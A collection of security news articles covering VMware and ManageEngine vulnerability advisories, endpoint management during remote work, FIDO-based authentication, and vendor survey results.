For the second time in less than a week, VMware is warning about a critical vulnerability (CVE-2020-4006). This time, the affected solutions are VMware Workspace One Access, Access Connector, VMware Identity Manager and VMware Identity Manager Connector.
As some of these are components of the VMware Cloud Foundation (vIDM) and vRealize Suite Lifecycle Manager (vIDM) product suites, those are impacted as well.
About the vulnerability (CVE-2020-4006)
Not much has been shared about CVE-2020-4006, except that it’s a command injection vulnerability that could allow a malicious actor with network access to the administrative configurator on port 8443 and a valid password for the configurator admin account to execute commands with unrestricted privileges on the underlying operating system.
The vulnerability was privately reported to VMware and the company categorized it as “critical.”
Affected products include:
- VMware Workspace One Access v20.10 (Linux)
- VMware Workspace One Access v20.01 (Linux)
- VMware Identity Manager v3.3.3 (Linux)
- VMware Identity Manager v3.3.2 (Linux)
- VMware Identity Manager v3.3.1 (Linux)
- VMware Identity Manager Connector v3.3.2 and 3.3.1 (Linux)
- VMware Identity Manager Connector v3.3.3, 3.3.2, and 3.3.1 (Windows)
- VMware Cloud Foundation (vIDM) v4.x (running on any platform)
- vRealize Suite Lifecycle Manager (vIDM) v8.x (running on any platform)
VMware did not say whether the flaw is under active exploitation, but they released workarounds (and instructions on how to remove them) as they are working on the patches.
“This workaround is relevant for the configurator hosted on port 8443. Impacts are limited to functionality performed by this service. Configurator-managed setting changes will not be possible while the workaround is in place. If changes are required please revert the workaround following the instructions below, make the required changes and disable again until patches are available. In addition, most of the system diagnostics dashboard will not be displayed,” the company noted.
Last week, VMware patched critical flaws in its ESXi hypervisor that were exploited during the Tianfu Cup Pwn Contest that was held in Chengdu, China, earlier this month.
COVID-19 and the subsequent global recession have thrown a wrench into IT spending. Many enterprises have placed new purchases on hold. Gartner recently projected that global spending on IT would drop 8% overall this year — and yet dollars allocated to cloud-based services are still expected to rise by approximately 19 percent, bucking that downward trend.
Underscoring the relative health of the cloud market, IDC reported that all growth in traditional tech spending will be driven by four platforms over the next five years: cloud, mobile, social and big data/analytics. Their 2020-2023 forecast states that traditional software continues to represent a major contribution to productivity, while investments in mobile and cloud hardware have created new platforms which will enable the rapid deployment of new software tools and applications.
With entire workforces suddenly going remote all over the world, there certainly are a number of specific business problems that need to be addressed, and many of the big issues involve VPNs.
Assault on VPNs
Millions of employees are working from home, and they all have to securely access their corporate networks. The vast majority of enterprises still rely on on-premises servers to some degree (estimates range from 60% to 98%), therefore VPNs play a vital role in enabling that employee connection to the network. This comes at a cost, though: bandwidth is gobbled up, slowing network performance — sometimes to a crippling level — and this has repercussions.
Maintenance of the thousands of machines and devices connected to the network gets sacrificed. The deployment of software, updates and patches simply doesn’t happen with the same regularity as when everyone works on-site. One reason for this is that content distribution (patches, applications and other updates) can take up much-needed bandwidth, and as a result, system hygiene gets sacrificed for the sake of keeping employees productive.
Putting off endpoint management, however, exposes corporate networks to enormous risks. Bad actors are well aware that endpoints are not being maintained at the same level as pre-pandemic, and they are more than willing to take advantage. Recent stats show that the volume of cyberattacks today is pretty staggering — much higher than prior to COVID-19.
Get thee to the cloud: Acceleration of modern device management
Because of bandwidth concerns, the pressure to trim costs, and the need to maintain machines in new ways, many enterprises are accelerating their move to the cloud. The cloud offers a lot of advantages for distributed workforces while also reducing costs. But digital transformation and the move to modern device management can’t happen overnight.
Enterprises have invested too much time, money, physical space and human resources to just walk away. Not to mention, on-premises environments have been highly reliable. Physical servers are one of the few things IT teams can count on to just work as intended these days.
Hybrid environments offer a happy medium. With the latest technology, enterprises can begin migrating to the cloud and adapt to changing conditions, meeting the needs of distributed teams. They can also save some money in the process. At the same time, they don’t have to completely abandon their tried-and-true servers.
Solving specific business problems: Content distribution to keep systems running
But what about those “specific business problems,” such as endpoint management and content distribution? Prior to COVID-19, this had been one of the biggest hurdles to digital transformation. It was not possible to distribute software and updates at scale without negatively impacting business processes and without excessive cost.
The issue escalated with the shift to remote work. Fortunately, technology providers have responded, developing solutions that leverage secure and efficient delivery mechanisms, such as peer-to-peer content distribution, that can work in the cloud. Even in legacy environments, vast improvements have been made to reduce bandwidth consumption.
These solutions allow enterprises to transition from a traditional on-premises infrastructure to the cloud and modern device management at their own speed, making their company more agile and resilient to the numerous risks they encounter today. Breakthrough technologies also support multiple system management platforms and help guarantee endpoints stay secure and updated even if corporate networks go down – something that, given the world we live in today, is a very real possibility.
Companies like Garmin and organizations such as the University of California San Francisco joined the unwitting victims of ransomware attacks in recent months. Their systems were seized, only to be released upon payment of millions of dollars.
While there is the obvious hard cost involved, there are severe operational costs as well — employees that can’t get on the network to do their jobs, systems must be scanned, updated and remediated to ensure the network isn’t further compromised, etc. A lot has to happen within a short period of time in the wake of a cyberattack to get people back to work as quickly and safely as possible.
Fortunately, with modern cloud-based content distribution solutions, all that is needed for systems to stay up is electricity and an internet connection. Massive redundancy is being built into the design of products to provide extreme resilience and help ensure business continuity in case part or all of the corporate network goes down.
The newest highly scalable, cloud-enabled content distribution options enable integration with products like Azure CDN and Azure Storage and also provide a single agent for migration to modern device management. With features like cloud integration, internet P2P, and predictive bandwidth harvesting, enterprises can leverage a massive amount of bandwidth from the internet to manage endpoints and ensure they always stay updated and secure.
Given these new developments precipitated and accelerated by COVID-19, as well as the clear, essential business problem these solutions address, expect to see movement and growth in the cloud sector. Expect to see an acceleration of modern device management, and despite IT spending cuts, expect to see a better, more secure and reliable, cost efficient, operationally efficient enterprise in the days to come.
The story of digital authentication started in an MIT lab in 1961, when a group of computer scientists got together and devised the concept of passwords. Little did they know the anguish it would cause over the next 50 years. Today, most people possess more than 90 username-and-password combinations and would rather click “Reset password” than try to remember them all.
Unfortunately, passwords are not only inconvenient, but dangerous as well – it’s a problem the world has been grappling with for the last 20 years, at least. Somewhere in the background, though, the authentication wheel has been turning and recently, at the Apple Worldwide Developer Conference (WWDC), two promising announcements were made.
But first, let’s backtrack a bit…
Everybody loves pizza
Authentication has evolved in several interesting ways. Two-factor authentication, for example, was developed in response to account takeover fraud – and it had its place. But when people started doubling up on the knowledge factor, we started seeing instances of knowledge-based authentication where, if you forgot your password, you could enter your mother’s maiden name, the title of your favorite book or your favorite food. Attackers could still succeed by guessing because, as it turns out, most people like pizza!
What if those scientists had started out differently and looked more closely at how other valuables were being protected?
House and car keys, for example, still represent strong possession factors that grant access to high-value assets. They’ve been used for ages with great success and, as a result, make the concept of possession as a primary factor easy for users to understand: “keep your keys safe, it grants you access.” There was never a need to add an extra layer of authentication.
Fast-forward to the digital era, and car keys have evolved to enable keyless entry. Houses, too, are commonly accessed with a remote. In both cases, unique challenge-response mechanisms are used for every transaction, making them impossible to intercept or copy.
Which brings me back to the first of two Apple announcements mentioned earlier.
Where physical meets digital
After much experimenting with identification and endpoints, the iPhone can now act as a car key. Though Apple devices are protected by biometrics and PINs, isn’t it ironic that after all this time, the iPhone – in all its sophisticated glory – has become like a physical key in a sense?
Had that MIT team been able to use an uncopiable “digital key,” perhaps today’s digital world would not be littered with billions of passwords, and attackers would have had to physically approach their victims to steals their keys. That would have cost money and exposed them to capture, making attacks much more costly and risky when compared to attacks that are carried out by sending out thousands of phishing emails at a time.
Of course, there have been several attempts to come up with alternatives. Many dedicated hardware devices have been used over the years with varying degrees of success, but no-one has ever hit the nail on the head.
Some companies allocated a number but did not generate it themselves. Instead, they used a number found or calculated on the device (like the phone’s IMEI or browser fingerprinting), breaking the challenge-response paradigm and nullifying the isolation principle. Others issued physical hardware (like keys) that created cost and distribution challenges, not to mention them being yet another thing for users to carry around.
A vision of endpoint perfection
Companies entering this space need to recognize the value of secure endpoints and find a solution that will:
- Ensure that each endpoint instance is allocated a unique, once-off value
- Ensure that each challenge-response mechanism is unique every time
- Limit the “key” to a single use and having a unique “key” for each mobile app
- Have the ability to issue new keys for each new use case and make the linking easy
- Have the ability to issue keys to devices that users already have in their possession
This can result in stable endpoints. Though certain requirements may force a business to include passwords here and there, the endpoint always needs to be the anchor.
When looking at companies that applied the security principles mentioned above, many arrived at similar solutions. The FIDO Alliance, for example, launched eight years ago to tackle the world’s over-reliance on passwords. They chose to focus mainly on protecting website logins. However, there are ways that businesses can obtain certifications and become FIDO compliant.
Android announced that FIDO would be built into their devices. Microsoft then followed suit, adding it to their authentication setup in Windows (Windows Hello). Only one dominant player remained – Apple – and they were silent. Then, suddenly, with iOS 13.3, Safari started supporting external FIDO tokens. So, when Apple joined the FIDO Alliance in February this year, many were already anticipating a WWDC unveiling – yes, the second announcement.
Now, the endpoint puzzle is finally complete and later this year, all major desktop (Windows and macOS) and mobile (iOS and Android) operating systems will feature built-in FIDO authenticators operating as secure endpoints.
Trusted endpoints: Where we need to be
The vision of trusted endpoints is becoming a reality and finally, context-specific identities can be provisioned into most consumer devices. Consumers can now trust in a physical device, not in some digital thing that can easily be lost or forgotten.
To succeed, attackers will need to gain access to the physical device, which is not easily done.
Of course, there are many challenges we still need to tackle. However, they pale in comparison to the potential that now exists to create exciting new customer journeys using a universal platform authenticator.
Vulnerability management (VM) technology addresses the threat landscape, which is in a constant state of flux. The wider dispersal of endpoints across private and public cloud environments increases the points of vulnerabilities in an enterprise network, intensifying the demand for VM solutions that make endpoints easier to track, verify, and secure.
To prevent attacks and damage to a business, VM providers employ various means of identifying, prioritizing, communicating, and suggesting possible responses to the risks companies face in their networked business environments.
The leading VM platforms provide a complete picture of a client’s security posture, correlating the client organization’s assets, classifying their importance with the vulnerabilities identified in the scan, and offering information for remediation.
A multilayered defense
Frost & Sullivan’s latest thought leadership paper analyzes the threat landscape and the role of VM in addressing the security concerns of the entire enterprise. It analyzes end-user willingness to invest in VM platforms that help provide a holistic cybersecurity approach in various areas, including vulnerability prioritization, automated workflows, and third-party integration.
“This aids a multilayered defense, which has proven to be superior to discrete technologies working separately in network defense. VM platforms that allow IT departments to conduct continual vulnerability assessments are emerging as one of the top five solutions for organizations concerned about system vulnerabilities as part of their security maturity improvement initiatives.”
According to the research, two out of every three cyberattacks in the United States and three out of every four in Europe are categorized as severe by the organizations affected by them.
Kaseya announced the results of its sixth annual IT operations benchmark report, consisting of two distinct survey audiences: IT practitioners (the IT managers and technicians working daily with technology) and IT leaders (IT directors and above).
The study surveyed 878 SMB respondents, 543 of whom were IT practitioners and 335 were IT leaders. The differences in priorities and concerns between the two audiences understandably center around aspects of their roles impacted most by COVID-19: IT leaders are currently more focused on maintaining operations while keeping IT budgets in check, whereas one of IT practitioners’ greatest struggles is maintaining productivity using limited resources.
However, many similarities also emerged for both groups, including an emphasis on IT security, data protection and the interplay between automation and productivity in 2020.
Improving security is a top priority
Although 63% of IT practitioners said they had not experienced a security breach or ransomware attack in the past three years, the increase in cyberattacks during the pandemic has cemented cybersecurity and data protection as a top priority for both groups.
More than half of IT practitioners and 60% of IT leaders listed “improving IT security” as their top priority in 2020, and more than half of respondents from both groups named “cybersecurity and data protection” as their top challenge.
But managing and working with limited budgets makes securing their company during this time difficult for IT teams. Although 73% of IT leaders are optimistic that their IT budgets will remain the same or increase in 2021, nearly one-third are still concerned about having inadequate IT budgets or resources to meet demands — a similar consideration for 32% of practitioners.
As a result of limited budgets, less than a third of practitioners are actually able to patch remote, off-network devices. This potentially exposes the entire company’s networks to higher security risks given the increase in remote workforces using personal devices or connecting to unsecured Wi-Fi connections during the pandemic.
Investing in IT automation improves productivity and reduces costs
In addition to potentially making companies vulnerable to security risks, slashed budgets can also impact an IT team’s productivity. Luckily, both IT practitioners and leaders are on the same page about the solution to this problem in 2020: automation.
IT practitioners who listed “increasing IT productivity through automation” and IT leaders who named “reducing IT costs” are simply pursuing the same goal, since higher productivity ultimately reduces operating costs.
When asked about the technologies IT leaders are planning to invest in for 2021, 60% said “IT automation.” Likewise, 38% of practitioners named “automation of IT processes” as a top use case for their endpoint management solution.
Endpoint protection has evolved to safeguard from complex malware and evolving zero-day threats.
To select an appropriate endpoint protection solution for your business, you need to think about a variety of factors. We’ve talked to several cybersecurity professionals to get their insight on the topic.
Theresa Lanowitz, Head of Evangelism, AT&T Cybersecurity
Corporate endpoints represent a top area of security risk for organizations, especially considering the shift to virtual operations brought on by COVID-19. As malicious actors target endpoints with new types of attacks designed to evade traditional endpoint prevention tools, organizations must seek out advanced endpoint detection and response (EDR) solutions.
Traditionally, enterprise EDR solutions carry high cost and complexity, making it difficult for organizations to implement EDR successfully. While many security teams recognize the need for EDR, most do not have the resources to manage a standalone endpoint security solution.
For this reason, when selecting an EDR solution, it’s critical to seek a unified solution for threat detection, incident response and compliance, to be incorporated into an organization’s existing security stack, eliminating any added cost or complexity. Look for endpoint solutions where security teams can deploy a single platform that delivers advanced EDR combined with many other essential security capabilities in a single pane of glass, in an effort to drive efficiency of security and network operations.
Overall, organizations should select an EDR solution that enables security teams to detect and respond to threats faster while eliminating the cost and complexity of maintaining yet another point security solution. This approach can help organizations bolster their cybersecurity and network resiliency, with an eye towards securing the various endpoints used in today’s virtual workforce.
Rick McElroy, Cyber Security Strategist, VMware Carbon Black
With the continuously evolving threat landscape, there are a number of factors to consider during the selection process. Whether a security team is looking to replace antiquated malware prevention or empower a fully-automated security operations process, here are the key considerations:
- Does the platform have the flexibility for your environment? Not all endpoints are the same, therefore broad coverage of operating systems is a must.
- Does the vendor support the MITRE ATT&CK Framework for both testing and maturing the product? Organizations need to test security techniques, validate coverage and identify gaps in their environments, and implement mitigation to reduce attack surface.
- Does it provide deeper visibility into attacks than traditional antivirus? Organizations need deeper context to make a prevention, detection or response decision.
- Does the platform provide multiple security functionality in one lightweight sensor? Compute is expensive, endpoint security tools should be as non-impactful to the system as possible.
- Is the platform usable at scale? If your endpoint protection platform isn’t centrally analyzing behaviors across millions of endpoints, it won’t be able to spot minor fluctuations in normal activity to reveal attacks.
- Does the vendor’s roadmap meet the future needs of the organization? Any tool selected should allow teams the opportunity for growth and ability to use it for multiple years, building automated processes around it.
- Does the platform have open APIs? Teams want to integrate endpoints with SEIM, SOAR platforms and network security systems.
David Ngo, VP Metallic Products and Engineering, Commvault
With millions working remotely due to COVID-19, laptop endpoints being used by employees while they work from home are particularly vulnerable to data loss.
This has made it more important than ever for businesses to select a strong endpoint protection solution that:
- Lowers the risk of lost data. The best solutions have automated backups that run multiple times during the day to ensure recent data is protected and security features such as geolocation and remote wipe for lost or stolen laptops. Backup data isolation from source data can also provide an extra layer of protection from ransomware. In addition, anomaly detection capabilities can identify abnormal file access patterns that indicate an attack.
- Enables rapid recovery. If an endpoint is compromised, the solution should accelerate data recovery by offering metadata search for quick identification of backup data. It’s also important for the solution to provide multiple granular restore options – including point in time, out of place, and cross OS restores – to meet different recovery needs.
- Limits user and IT staff administration burdens. Endpoint solutions with silent install and backup capabilities require no action from end users and do not impact their productivity. The solution should also allow users and staff to access backup data, anytime, anywhere, from a browser-enabled device, and make it possible for employees to search and restore files themselves.
James Yeager, VP of Public Sector, CrowdStrike
Decision-makers seeking the best endpoint protection (EPP) solution for their business should be warned legacy security solutions are generally ineffective, leaving organizations highly susceptible to breaches, placing a huge burden on security teams and users.
Legacy tools, engineered by on-premises architectures, are unable to keep up with the capabilities made available in a modern EPP solution, like collecting data in real-time, storing it for long periods and analyzing it in a timely manner. Storing threat telemetry data in the cloud makes it possible to quickly search petabytes of data in an effort to glean historical context for activities running on any managed system.
Beware of retrofitted systems from vendors advertising newer “cloud-enabled” features. Simply put, these “bolt-on” models are unable to match the performance of a cloud-native solution. Buyers run the risk of their security program becoming outdated with tools that cannot scale to meet the growing needs of today’s modern, distributed workforce.
Furthermore, comprehensive visibility into the threat landscape and overall IT hygiene of your enterprise are foundational for efficient security. Implementing cloud-native endpoint detection and response (EDR) capabilities into your security stack that leverages machine learning will deliver visibility and detection for threat protection across the entire kill chain. Additionally, a “hygiene first” approach will help you identify the most critical risk areas early-on in the threat cycle.
Conducted during the coronavirus pandemic, 1E unveils the findings of an analysis of the remote employee experience and the digital workplace in 2020.
Vanson Bourne and 1E surveyed employees across eight industries in the United States and found that enterprise IT teams are failing to deliver a positive remote employee experience. Data shows IT has more to do in order to prepare their organizations—and employees—for a work from anywhere enterprise in the aftermath of the coronavirus pandemic.
“Never before have we had this level of insight about the experience employees have with their devices—and IT generally—in the post-COVID world. In the work from anywhere enterprise, endpoint management tools are the central nervous system because the endpoint is no longer just a device.
“Endpoints have now become much more personal and integral to the lives of all employees, enabling them to stay connected and work. This research helps businesses understand the new digital employee experience and reimagine the traditional definition of the workplace,” says Sumir Karayi, CEO at 1E.
46m Americans are now totally dependent on their laptop
At its heart, the digital work from anywhere enterprise is about putting people first and serving their needs wherever they choose to work, but the data from the research indicates that IT teams, along with over-burdened and ill-equipped service desks, are struggling to meet the needs of newly remote employees.
Since the start of the pandemic, 46m people have moved from working in the office on a full-time basis to working from home full-time. That’s a significant amount of people forced into new ways of working overnight and who are totally reliant on their laptop for work and communication.
“IT must be able to understand and optimize the employee’s world through the endpoint. But what the research shows is that the speed of change has left legacy IT tools ineffective in their management of remote endpoints and the digital employee experience.
“This research proves that legacy tools must be replaced with a new generation of endpoint management solutions designed to cope with the complexities of the work from anywhere enterprise; they need to be real-time, autonomic, and scalable,” Karayi concludes.
US employees take huge productivity hit when working remotely
98% of US knowledge workers said that device performance is critical to their ability to work remotely but 36m (53%) reported that their device performs slower outside the office and 33m (48%) flagged it as a top three issue that hinders their productivity and overall employee experience.
25m employees (37%) are also experiencing more issues working remotely, and those issues are taking much longer to resolve. 49m employees (72%) are reporting that it takes days and weeks to get issues fixed. Yet more worryingly, 50m employees (74%) experience repeat issues.
But when issues are resolved, 46m employees (68%) are disrupted by the service desk, with only 21m (31%) of employees able to continue their work during the process. Shockingly, 18m employees (26%) said they couldn’t work at all when an issue is being fixed. Needless to say, 50m (74% of employees) are feeling less connected than ever to their colleagues.
“Too often we only ask IT about IT issues. What’s refreshing about this research is that employees took part and were asked how they’re coping in this new normal. The data shows how critical endpoint automation is so employees can just get their work done,” says Paul Hardy, Evangelist, Chief Innovation Office, at ServiceNow.
“The fact that 74% of employees are facing repeat issues proves that a lack of automation doesn’t just impact the employee experience, but further burdens the service desk and holds organizations back from creating meaningful value and growth,” comments Hardy.
“The reality is that COVID has ripped up the enterprise IT book, and it’s time to use research such as this to rewrite the norm.”
The work from anywhere enterprise and the remote employee experience beyond 2020
As well as the employee experience, the research has also found other issues for IT to deal with on the journey to a work from anywhere enterprise.
Most damagingly, security (50m or 73% of respondents aren’t concerned about their corporate device being hacked when working remotely) and software provisioning (24m or 35% of respondents don’t have all the software they need to work from home effectively).
Is your organization using ManageEngine Desktop Central? If the answer is yes, make sure you’ve upgraded to version 10.0.474 or risk falling prey to attackers who are actively exploiting a recently disclosed RCE flaw (CVE-2020-10189) in its software.
We’re seeing this being exploited in the wild. Watch for shady shit dropping out of java.exe, LOLBIN download of 2nd stage via bitsadmin or certutil
Working on a blog post, watch https://t.co/yI3VuU1IIa
— Eric Capuano (@eric_capuano) March 10, 2020
— chris doman (@chrisdoman) March 9, 2020
About ManageEngine Desktop Central
ManageEngine Desktop Central is developed by ManageEngine, a division of Zoho Corporation, an software development company that focuses on web-based business tools and information technology.
Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to centrally control servers, laptops, smartphones, and tablets.
About the vulnerability (CVE-2020-10189)
CVE-2020-10189 allows for deserialization of untrusted data and allows unauthenticated, remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central and achieve SYSTEM/root privileges.
This would allow them to install malicious programs or push malicious updates onto the managed devices, lock them, and so on.
The vulnerability affects Desktop Central versions prior to 10.0.474 and was unearthed by Steven Seeley of Source Incite, who revealed its existence publicly last week through a tweet and security advisory that also links to PoC exploit code.
At the time, the vulnerability was a zero-day (unknown to and unaddressed by the vendor), since Seeley didn’t share his findings with Zoho/ManageEngine prior to the advisory’s publication – ostensibly because “Zoho typically ignores researchers.”
A day later ManageEngine issued a security update (v10.0.479) to correct the flaw and offered mitigation advice.
Nate Warfield, senior security program manager at Microsoft, used the Shodan search engine to find some 2,300 publicly accessible Desktop Central instances.
But even instances that aren’t exposed externally can be exploited by attackers who have achieved access to the target organization’s through another security hole, allowing them to broaden their presence.
Finally, since the solution is often used by managed service providers (MSPs), compromised Desktop Central instances could result in the simultaneous compromise of many client organizations’ endpoints and, through them, networks.
Organizations who use ManageEngine Desktop Central should upgrade to a safe version as soon as possible.